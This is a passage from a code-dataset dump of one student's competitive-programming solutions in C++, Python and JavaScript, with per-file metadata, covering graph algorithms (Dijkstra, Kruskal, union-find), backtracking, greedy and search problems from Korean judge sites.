}\n else if(cmd == \"toggle\") {\n cin >> num;\n if(s & (1 << num)) s &= ~(1 << num);\n else s |= (1 << num);\n }\n else if(cmd == \"all\") {\n s = (1 << 21) - 1;\n }\n else if(cmd == \"empty\") s = 0;\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.42465752363204956, "alphanum_fraction": 0.47534245252609253, "avg_line_length": 20.5, "blob_id": "44601b66291296d440dcb7503adc837567062b77", "content_id": "afb50138094e048c5c652ec1333f5124a3f4f257", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 744, "license_type": "no_license", "max_line_length": 93, "num_lines": 34, "path": "/programmers/Level 1/recommend_new_id.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 신규 아이디 추천\n2021 KAKAO BLIND RECRUITMENT\n2021-12-26\n*/\nfunction solution(new_id) {\n // 1\n new_id = new_id.toLowerCase();\n\n // 2\n new_id = new_id.replace(/[^\\w-.]/g, '');\n\n // 3\n new_id = new_id.replace(/[.]+/g, '.');\n\n // 4\n new_id = new_id[0] === \".\" ? new_id.slice(1) : new_id;\n new_id = new_id[new_id.length - 1] === \".\" ? new_id.slice(0, new_id.length - 1) : new_id;\n\n // 5\n new_id = new_id.length === 0 ? \"a\" : new_id;\n\n // 6\n new_id = new_id.slice(0, 15);\n new_id = new_id[14] === '.' ? new_id.slice(0, 14) : new_id;\n\n // 7\n if (new_id.length < 3) {\n let tmp = new_id[new_id.length - 1];\n while (new_id.length < 3) new_id += tmp;\n }\n\n return new_id;\n}" }, { "alpha_fraction": 0.5056179761886597, "alphanum_fraction": 0.5692883729934692, "avg_line_length": 15.75, "blob_id": "3856a2a3bd166ceeccc9e7fe225df2cfa565e5cf", "content_id": "d7971ebdacf4811f9f40a6cb2d7d7e60b36cb5e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 35, "num_lines": 16, "path": "/BOJ/Mathematics/1735_2.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 1735_2.py (math 라이브러리의 gcd 함수 사용)\n# BOJ 1735: 분수 합\n# DATE: 2022-03-16\nimport sys\nimport math\nread = sys.stdin.readline\n \na, b = map(int, read().split())\nc, d = map(int, read().split())\n\nn = a * d + b * c\nm = b * d\n\ndiv = math.gcd(n, m)\n\nprint(n // div, m // div)" }, { "alpha_fraction": 0.4885145425796509, "alphanum_fraction": 0.5107197761535645, "avg_line_length": 19.746030807495117, "blob_id": "a1690b03c84b821471aec46aecb81051c80e9ee7", "content_id": "1cdccf0874cc4315bb33b5069a4353aa0962ed13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 58, "num_lines": 63, "path": "/BOJ/MST/1922_1.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 1922번: 네트워크 연결\n//Kruskal Algorithm\n//2021-07-12\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint n, m, a, b, c, ans=0;\npair<int, pair<int, int>> edge[100000];\n\nint getParent(int parent[], int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n int parent[n+1];\n\n for(int i = 1 ; i <= n ; i++){\n parent[i] = i;\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> a >> b >> c;\n edge[i].first = c;\n edge[i].second.first = a;\n edge[i].second.second = b;\n }\n\n sort(edge, edge + m);\n\n for(int i = 0 ; i < m ; i++){\n int a = edge[i].second.first;\n int b = edge[i].second.second;\n int c = edge[i].first;\n\n if(findParent(parent, a, b)) continue;\n else{\n unionParent(parent, a, b);\n ans += c;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4373657703399658, "alphanum_fraction": 0.46814602613449097, "avg_line_length": 15.84337329864502, "blob_id": "0ce115c5b4f901b72bba30e6aee26bfda31dd853", "content_id": "824b7b6a491c7187a30ea8aa781d0efc53480972", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1493, "license_type": "no_license", "max_line_length": 81, "num_lines": 83, "path": "/BOJ/Greedy/2513.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2513번: 통학버스\nDATE: 2021-01-14\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n\tint n, k, s, cnt;\n\tlong long d1, d2;\n\tcin >> n >> k >> s;\n\t\n\tvector<pair <int, int>> v;\n\n\tfor(int i = 0 ; i < n ; i++) {\n\t\tint loc, dst;\n\t\tcin >> loc >> dst;\n\t\tv.push_back(make_pair(loc, dst));\n\t}\n\tv.push_back(make_pair(s, 0));\n\tsort(v.begin(), v.end()); \n\n\tint str = 0, end = n;\n\tint idx = lower_bound(v.begin(), v.end(), make_pair(s, 0)) - v.begin(); //학교 인덱스\n\n\tfor (int i = 0; i <= n; i++) {\n\t\tcout << v[i].first << \" \" << v[i].second << endl;\n\t}\n\n\tint i = str;\n\td1 = 0, cnt = 0;\n\twhile (i < idx) { //학교 앞\n\t\tcnt += v[i].second;\n\n\t\tif (cnt <= k) { //한번에 태울 수 있을 때\n\t\t\tv[i].second = 0;\n\t\t\ti++;\n\t\t\tif (i == idx) {\n\t\t\t\td1 += (s - v[str].first) * 2;\n\t\t\t}\n\t\t}\n\t\telse if (cnt > k) { //나눠 태워야 할 때\n\t\t\tv[i].second = cnt - k;\n\t\t\tcnt = cnt - v[i].second; \n\n\t\t\td1 += (s - v[str].first) * 2;\n\n\t\t\tcnt = 0;\n\t\t\tstr = i;\n\t\t}\n\t}\n\n\tint j = end;\n\td2 = 0, cnt = 0;\n\twhile (j > idx) { // 학교 뒤\n\t\tcnt += v[j].second;\n\n\t\tif (cnt <= k) { //한번에 태울 수 있을 때\n\t\t\tv[j].second = 0;\n\t\t\tj--;\n\t\t\tif (j == idx) {\n\t\t\t\td2 += (v[end].first - s) * 2;\n\t\t\t}\n\t\t}\n\t\telse if (cnt > k) { //나눠 태워야 할 때\n\t\t\tv[j].second = cnt - k;\n\t\t\tcnt = cnt - v[j].second;\n\n\t\t\td2 += (v[end].first - s) * 2;\n\n\t\t\tcnt = 0;\n\t\t\tend = j;\n\t\t}\n\t}\n\n\tcout << d1 + d2;\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.4539969861507416, "alphanum_fraction": 0.4871794879436493, "avg_line_length": 14.090909004211426, "blob_id": "17aa0fdee30b1ce14ade7892d70104af482ced00", "content_id": "d07d99788b65063c5a9c7c5b9197f2530972b41d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 677, "license_type": "no_license", "max_line_length": 71, "num_lines": 44, "path": "/BOJ/Backtracking/9663.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9663번: N-Queen\nDATE: 2022-04-15\n*/\n#include <iostream>\n#define MAX 15\nusing namespace std;\n\nint N, ans;\nint col[MAX];\n\nbool check(int num){\n for(int i = 0 ; i < num ; i++){\n if(col[i] == col[num]) return false; // 같은 행\n else if(abs(col[num] - col[i]) == num - i) return false; // 대각선\n }\n\n return true;\n}\n\nvoid nqueen(int num){\n if(num == N){\n ans++;\n return;\n }\n\n for(int i = 0 ; i < N ; i++){\n col[num] = i;\n if(check(num)) nqueen(num + 1);\n }\n \n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n \n cin >> N;\n\n nqueen(0);\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4431487023830414, "alphanum_fraction": 0.5072886347770691, "avg_line_length": 18.628570556640625, "blob_id": "9c3f91a1d34105f6582cf08162d7a342a9ca7387", "content_id": "5a074a30736964ecb8de8e3edf1407b56691c035", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 700, "license_type": "no_license", "max_line_length": 72, "num_lines": 35, "path": "/BOJ/Binary Search/18353.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 18353번: 병사 배치하기\nDATE: 2022-01-08\nUPDATE: 2022-02-11\nLongest Increasing Subsequence\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n cin >> n;\n \n vector<int> v1(n), v2;\n\n for(int i = 0 ; i < n ; i++) cin >> v1[i];\n reverse(v1.begin(), v1.end());\n\n for(int i = 0 ; i < n ; i++) {\n if(v2.empty() || v1[i] > v2.back()) {\n v2.push_back(v1[i]);\n continue;\n }\n\n int idx = lower_bound(v2.begin(), v2.end(), v1[i]) - v2.begin();\n v2[idx] = v1[i];\n }\n\n cout << n - v2.size();\n\n return 0;\n}" }, { "alpha_fraction": 0.4897959232330322, "alphanum_fraction": 0.559183657169342, "avg_line_length": 16.571428298950195, "blob_id": "31bf6fdb8ded23417ee757b01449f41f77ef841b", "content_id": "3cfeef14cb38f9f30d41ac12f760ee1d5d06d1d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 257, "license_type": "no_license", "max_line_length": 41, "num_lines": 14, "path": "/BOJ/Mathematics/1934.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 1934.py\n# BOJ 1934번: 최소공배수\n# DATE: 2022-03-18\nimport sys\nread = sys.stdin.readline\n\ndef gcd(a, b):\n return a if b == 0 else gcd(b, a % b)\n\nt = int(read())\n\nfor _ in range(t):\n a, b = map(int, read().split())\n print(a * b // gcd(a, b))" }, { "alpha_fraction": 0.5146579742431641, "alphanum_fraction": 0.5423452854156494, "avg_line_length": 17.636363983154297, "blob_id": "fd5b7500aa523d0345a682e2f564b04e86cb6ba6", "content_id": "888f8afc3e5c2e9ad22cbfafca61fab5e61351c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 614, "license_type": "no_license", "max_line_length": 91, "num_lines": 33, "path": "/programmers/Level 2/h-index.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: H-index\n2021-12-26\n*/\n#include <vector>\n#include <algorithm>\n#include <iostream>\nusing namespace std;\n\nint solution(vector<int> citations) {\n int answer = 0;\n int num = citations.size();\n \n sort(citations.begin(), citations.end()); \n \n for(int i = num ; i >= 0 ; i--) {\n int index = lower_bound(citations.begin(), citations.end(), i) - citations.begin();\n\n if(i <= num - index) {\n answer = i;\n break;\n }\n }\n \n return answer;\n}\n\nint main(){\n int answer = solution({3, 0, 6, 1, 5});\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.4646017551422119, "alphanum_fraction": 0.51106196641922, "avg_line_length": 13.612903594970703, "blob_id": "c58b02c6d4a346cbc59bce19e6962c3f50d5c729", "content_id": "fb75844517bd545518e13593ca04654f607abfd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 460, "license_type": "no_license", "max_line_length": 52, "num_lines": 31, "path": "/BOJ/Implementation/1927.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1252", "text": "/*\nBOJ 1927¹ø: ÃÖ¼Ò Èü\nDATE: 2021-01-07\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0);\n\tint n, x;\n\tpriority_queue<int, vector <int>, greater <int>>pq;\n\n\tcin >> n;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> x;\n\n\t\tif (x != 0) pq.push(x);\n\t\telse if (x == 0) {\n\t\t\tif (pq.empty()) {\n\t\t\t\tcout << 0 << \"\\n\";\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tcout << pq.top() << \"\\n\";\n\t\t\tpq.pop();\n\t\t}\n\t}\n\t\n\treturn 0;\n}" }, { "alpha_fraction": 0.4374590814113617, "alphanum_fraction": 0.459070086479187, "avg_line_length": 19.931507110595703, "blob_id": "60ca4ef7ca375b46e1d8edf9f62f234e852008f4", "content_id": "a15aa2305134b9ca31fd0457c0a1d9aeed2585ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1541, "license_type": "no_license", "max_line_length": 95, "num_lines": 73, "path": "/BOJ/Dijkstra/1238_2.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1238번: 파티\nDATE: 2021-07-13\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <queue>\n#include <algorithm>\n#define MAX 1001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int, int>> graph[MAX];\nint dst[MAX], ans[MAX];\nint n, m, x, s, e, t;\n\nvoid dijkstra(int start){\n priority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int,int>>> pq; //거리, 노드\n pq.push(make_pair(0, start));\n dst[start] = 0;\n\n while(!pq.empty()){\n int cost = pq.top().first;\n int now = pq.top().second;\n pq.pop();\n\n for(int i = 0 ; i < graph[now].size() ; i++){\n int next = graph[now][i].first;\n int nCost = graph[now][i].second;\n \n if(cost+nCost < dst[next]){\n dst[next] = cost + nCost;\n pq.push(make_pair(cost + nCost, next));\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m >> x;\n\n for(int i = 1 ; i <= n ; i++){\n dst[i] = INF;\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> s >> e >> t;\n graph[s].push_back(make_pair(e, t));\n }\n\n //i to x\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n dst[j] = INF;\n }\n dijkstra(i);\n ans[i] = dst[x];\n }\n\n for(int i = 1 ; i <= n ; i++) dst[i] = INF;\n\n // start x\n dijkstra(x);\n\n for(int i = 1 ; i <= n ; i++){\n ans[i] += dst[i];\n }\n\n cout << *max_element(ans+1, ans+n+1);\n\n return 0;\n}" }, { "alpha_fraction": 0.5322195887565613, "alphanum_fraction": 0.5680190920829773, "avg_line_length": 19, "blob_id": "b1eb07289480d985cbe1546b22961bcf16056d93", "content_id": "2250bd360cbcf292a58867f262a1c2bbfc0b99ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 429, "license_type": "no_license", "max_line_length": 42, "num_lines": 21, "path": "/programmers/Level 1/make_prime_number.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: 소수 만들기\n# date: 2022-04-14\nfrom itertools import combinations\nfrom math import sqrt\n\ndef isPrime(num):\n for i in range(2, int(sqrt(num) + 1)):\n if num % i == 0: return False\n \n return True\n \ndef solution(nums):\n answer = 0\n \n nums = sorted(nums)\n \n for i in combinations(nums, 3):\n if isPrime(sum(i)):\n answer += 1\n \n return answer" }, { "alpha_fraction": 0.4716981053352356, "alphanum_fraction": 0.48899370431900024, "avg_line_length": 20.94827651977539, "blob_id": "8a8c3b22c7a06b75ccc3afb40b5407575130b71d", "content_id": "d5e11218410dc40fc97715f507c5777d82a5a782", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1276, "license_type": "no_license", "max_line_length": 84, "num_lines": 58, "path": "/programmers/Level 2/delivery.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 배달\ndate: 2022-06-03\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 51\n#define INF 1e9\nusing namespace std;\n\nint dst[MAX];\nvector<pair<int,int>> graph[MAX];\n\nvoid dijkstra(int start){\n priority_queue<pair<int,int>, vector<pair<int,int>>, greater<pair<int,int>>> pq;\n \n pq.push({0, start});\n dst[start] = 0;\n \n while(!pq.empty()){\n int node = pq.top().second;\n int cost = pq.top().first;\n pq.pop();\n \n for(int i = 0 ; i < graph[node].size() ; i++){\n int nextNode = graph[node][i].first;\n int nextCost = graph[node][i].second;\n \n if(dst[nextNode] > cost + nextCost){\n dst[nextNode] = cost + nextCost;\n pq.push({dst[nextNode], nextNode});\n }\n }\n }\n}\n\nint solution(int N, vector<vector<int>> road, int K) {\n int answer = 0;\n \n for(auto i : road){\n int a = i[0];\n int b = i[1];\n int c = i[2];\n \n graph[a].push_back({b, c});\n graph[b].push_back({a, c});\n }\n \n fill(dst, dst+MAX, INF);\n dijkstra(1);\n \n for(int i = 1 ; i <= N ; i++){\n if(dst[i] != INF && dst[i] <= K) answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.4583333432674408, "alphanum_fraction": 0.47537878155708313, "avg_line_length": 20.571428298950195, "blob_id": "f72b39b2b603060dea1e0e7a41658e49e4a12d7c", "content_id": "205913b7d63651dae8d61d879edd58ba49f091af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 66, "num_lines": 49, "path": "/programmers/Level 2/printer.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2: 프린터\n//2021-10-06\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <queue>\nusing namespace std;\n\nint solution(vector<int> priorities, int location) {\n priority_queue<int, vector<int>> pq;\n queue<pair<int, int>> q; \n vector<int> v;\n int answer = 0;\n\n for(int i = 0 ; i < priorities.size() ; i++) {\n q.push(make_pair(priorities[i], i)); //중요도, 문서\n pq.push(priorities[i]);\n }\n \n int max = pq.top();\n \n while(!q.empty()) {\n pair<int,int> cur = q.front();\n \n if(cur.first < max) {\n while(cur.first != max) {\n q.push(q.front());\n q.pop();\n cur = q.front();\n }\n }\n else {\n v.push_back(cur.second);\n q.pop(); pq.pop();\n max = pq.top();\n }\n }\n \n answer = (find(v.begin(), v.end(), location) - v.begin()) + 1;\n \n return answer;\n}\n\nint main() {\n int answer = solution({2, 1, 3, 2}, 2);\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.31910276412963867, "alphanum_fraction": 0.3444283604621887, "avg_line_length": 18.471830368041992, "blob_id": "551f68828ecb991dfd148ccd749af4f24655fbf8", "content_id": "9c59a31f8f472bc5a4b684830ac81cc277c881d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2822, "license_type": "no_license", "max_line_length": 62, "num_lines": 142, "path": "/BOJ/Implementation/17144.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17144번: 미세먼지 안녕!\nDATE: 2022-03-15\n*/\n#include <iostream>\n#include <vector>\n#include <cstring>\n#define MAX 51\nusing namespace std;\n\nint arr[MAX][MAX], tmp[MAX][MAX];\nint up, down;\nint dr[4] = {-1, 0, 1, 0};\nint dc[4] = {0, 1, 0, -1};\nint r, c, t;\nvector<pair<int,int>> dust;\n\nvoid spread(){\n for(int i = 0 ; i < dust.size() ; i++){\n int row = dust[i].first;\n int col = dust[i].second;\n int value = arr[row][col];\n int cnt = 0;\n\n for(int j = 0 ; j < 4 ; j++){\n int nr = row + dr[j];\n int nc = col + dc[j];\n\n if(nr < 1 || nc < 1 || nr > r || nc > c) continue;\n if(arr[nr][nc] == -1) continue;\n\n tmp[nr][nc] += value / 5;\n cnt++;\n }\n \n tmp[row][col] += value - (value / 5) * cnt;\n }\n}\n\nvoid upside(){ // 반시계 방향\n int a, b = 0;\n\n for(int i = 2 ; i <= c ; i++){\n a = tmp[up][i];\n tmp[up][i] = b;\n b = a;\n }\n\n for(int i = up - 1 ; i >= 1 ; i--){\n a = tmp[i][c];\n tmp[i][c] = b;\n b = a;\n }\n\n for(int i = c - 1 ; i >= 1 ; i--){\n a = tmp[1][i];\n tmp[1][i] = b;\n b = a;\n }\n\n for(int i = 2 ; i <= up ; i++){\n a = tmp[i][1];\n tmp[i][1] = b;\n b = a;\n }\n}\n\nvoid downside(){ // 시계 방향\n int a, b = 0;\n\n for(int i = 2 ; i <= c ; i++){\n a = tmp[down][i];\n tmp[down][i] = b;\n b = a;\n }\n\n for(int i = down + 1 ; i <= r ; i++){\n a = tmp[i][c];\n tmp[i][c] = b;\n b = a;\n }\n\n for(int i = c - 1 ; i >= 1 ; i--){\n a = tmp[r][i];\n tmp[r][i] = b;\n b = a;\n }\n\n for(int i = r - 1 ; i >= down ; i--){\n a = tmp[i][1];\n tmp[i][1] = b;\n b = a;\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int ans = 0;\n cin >> r >> c >> t;\n\n for(int i = 1 ; i <= r ; i++){\n for(int j = 1 ; j <= c ; j++){\n cin >> arr[i][j];\n if(arr[i][j] == -1){\n if(up == 0) up = i;\n else down = i;\n }\n else if(arr[i][j] > 0) dust.push_back({i,j});\n }\n }\n\n while(t--){\n memset(tmp, 0, sizeof(tmp));\n\n // 미세먼지 확산\n spread();\n\n // 공기청정기 작동\n upside();\n downside();\n\n dust.clear();\n\n for(int i = 1 ; i <= r ; i++){\n for(int j = 1 ; j <= c ; j++){\n if(arr[i][j] == -1) continue;\n arr[i][j] = tmp[i][j];\n dust.push_back({i, j});\n }\n }\n }\n\n for(int i = 1 ; i <= r ; i++){\n for(int j = 1 ; j <= c ; j++){\n if(arr[i][j] > 0) ans += arr[i][j];\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4386920928955078, "alphanum_fraction": 0.4611716568470001, "avg_line_length": 19.690141677856445, "blob_id": "0e14c5974c6bca22ba3be6b50b774ad0f4dba969", "content_id": "751fa441b2d07ebcf46a03b8e97994a882284c40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 87, "num_lines": 71, "path": "/BOJ/Dijkstra/18352.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 18352번: 특정 거리의 도시 찾기\nDATE: 2021-02-25\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 300001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int, int>> graph[MAX];\nint d[MAX];\n\nvoid dijkstra(int start){\n priority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> pq;\n pq.push(make_pair(0, start));\n d[start] = 0;\n\n while(!pq.empty()){\n int cost = pq.top().first;\n int now = pq.top().second;\n pq.pop();\n\n for(int i = 0 ; i < graph[now].size() ; i++){\n int next = graph[now][i].first;\n int nCost = cost + graph[now][i].second;\n if(nCost < d[next]){\n d[next] = nCost;\n pq.push(make_pair(d[next], next));\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n priority_queue<int, vector<int>, greater<int>> pq;\n int n, m, k, x, check;\n cin >> n >> m >> k >> x;\n\n for(int i = 0 ; i < m ; i++){\n int a, b;\n cin >> a >> b;\n graph[a].push_back(make_pair(b, 1)); \n }\n\n for(int i = 1 ; i <= n ; i++){\n d[i] = INF;\n }\n\n dijkstra(x);\n\n for(int i = 1 ; i <= n ; i++){\n if(d[i] == k) {\n pq.push(i);\n }\n }\n\n if(pq.empty())\n cout << -1;\n else{\n while(!pq.empty()){\n cout << pq.top() << \"\\n\";\n pq.pop();\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.38260868191719055, "alphanum_fraction": 0.4153846204280853, "avg_line_length": 20.68115997314453, "blob_id": "4d7bbbd0cb0e20347cc2d86306888bbda422cba5", "content_id": "4c12d3aec0ce98165e176f957de05239346d55a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1507, "license_type": "no_license", "max_line_length": 82, "num_lines": 69, "path": "/BOJ/BFS_DFS/2665.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2665번: 미로만들기\nDATE: 2021-02-25\nBFS\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <string.h>\n#define MAX 51\nusing namespace std;\n\nint arr[MAX][MAX];\nint visited[MAX][MAX];\nint dx[] = {-1, 0, 1, 0};\nint dy[] = {0, 1 , 0, -1};\nint n;\n\nvoid bfs(){\n queue<pair<int, int>> q;\n\n memset(visited, -1, sizeof(visited));\n q.push(make_pair(0, 0));\n visited[0][0] = 0;\n\n while(!q.empty()){\n int x = q.front().first;\n int y = q.front().second;\n q.pop();\n\n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx >= 0 && nx < n && ny >= 0 && ny < n && arr[nx][ny]){ //1\n if(visited[nx][ny] == -1 || visited[nx][ny] > visited[x][y]){\n visited[nx][ny] = visited[x][y];\n q.push(make_pair(nx, ny));\n }\n }\n else if(nx >= 0 && nx < n && ny >= 0 && ny < n && !arr[nx][ny]){ //0\n if(visited[nx][ny] == -1 || visited[nx][ny] > visited[x][y] + 1){\n visited[nx][ny] = visited[x][y] + 1;\n q.push(make_pair(nx, ny));\n }\n }\n }\n }\n\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n;\n\n for (int i = 0 ; i < n; i++) {\n\t\tstring str;\n\t\tcin >> str;\n\t\tfor (int j = 0 ; j < n ; j++) {\n\t\t\tarr[i][j] = str[j] - '0';\n\t\t}\n\t}\n\n bfs();\n\n cout << visited[n-1][n-1];\n \n return 0;\n}" }, { "alpha_fraction": 0.4008714556694031, "alphanum_fraction": 0.4466230869293213, "avg_line_length": 14.333333015441895, "blob_id": "0cb4573c036dc7b314c81c7c494b133abeb46a18", "content_id": "40d51bc43ca76a5cc5e723601cfaa135c6c06815", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 461, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Greedy/11399.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11399번: ATM\n2021-03-29\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, time=0;\n cin >> n;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n sort(arr, arr + n); \n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j <= i ; j++){\n time += arr[j];\n }\n }\n\n cout << time;\n\n return 0;\n}" }, { "alpha_fraction": 0.45837321877479553, "alphanum_fraction": 0.4803827702999115, "avg_line_length": 19.115385055541992, "blob_id": "45c626752d6bbb6b3e10d86e52d6a8cc43c690b8", "content_id": "26f317f589c550c9bb64ed973c22e949907621a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1057, "license_type": "no_license", "max_line_length": 58, "num_lines": 52, "path": "/BOJ/Graph Theory/1717.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1717번: 집합의 표현\nDATE: 2021-02-15\nUnion-Find\n*/\n#include <iostream>\nusing namespace std;\n\nint getParent(int parent[], int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n cin >> n >> m;\n\n int parent[n+1];\n for(int i = 0 ; i <= n ; i++){\n parent[i] = i;\n }\n\n for(int i = 0 ; i < m ; i++){\n int x, y, z;\n cin >> x >> y >> z;\n\n if(x == 0) unionParent(parent, y, z);\n else if(x == 1){\n if(findParent(parent, y, z))\n cout << \"YES\" << \"\\n\";\n else\n cout << \"NO\" << \"\\n\";\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.42279940843582153, "alphanum_fraction": 0.45743146538734436, "avg_line_length": 18.828571319580078, "blob_id": "2eb1ded455c523c2865e0cfe1b0e5a3af5890669", "content_id": "d66228c8318f7c98058af5ba6d678e9afe65fc00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 705, "license_type": "no_license", "max_line_length": 81, "num_lines": 35, "path": "/BOJ/Mathematics/6219.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 6219번: 소수의 자격\n2022-01-20\n*/\n#include <iostream>\n#include <math.h>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b, d;\n int ans = 0;\n \n cin >> a >> b >> d;\n\n int prime[b + 1];\n char ch = d + '0';\n\n for(int i = 2 ; i <= b ; i++) prime[i] = i;\n\n for(int i = 2 ; i <= sqrt(b) ; i++){\n if(prime[i] == 0) continue;\n for(int j = i * i ; j <= b ; j += i) prime[j] = 0;\n }\n\n for(int i = a ; i <= b ; i++) {\n string str = to_string(prime[i]);\n if(prime[i] != 0 && find(str.begin(), str.end(), ch) 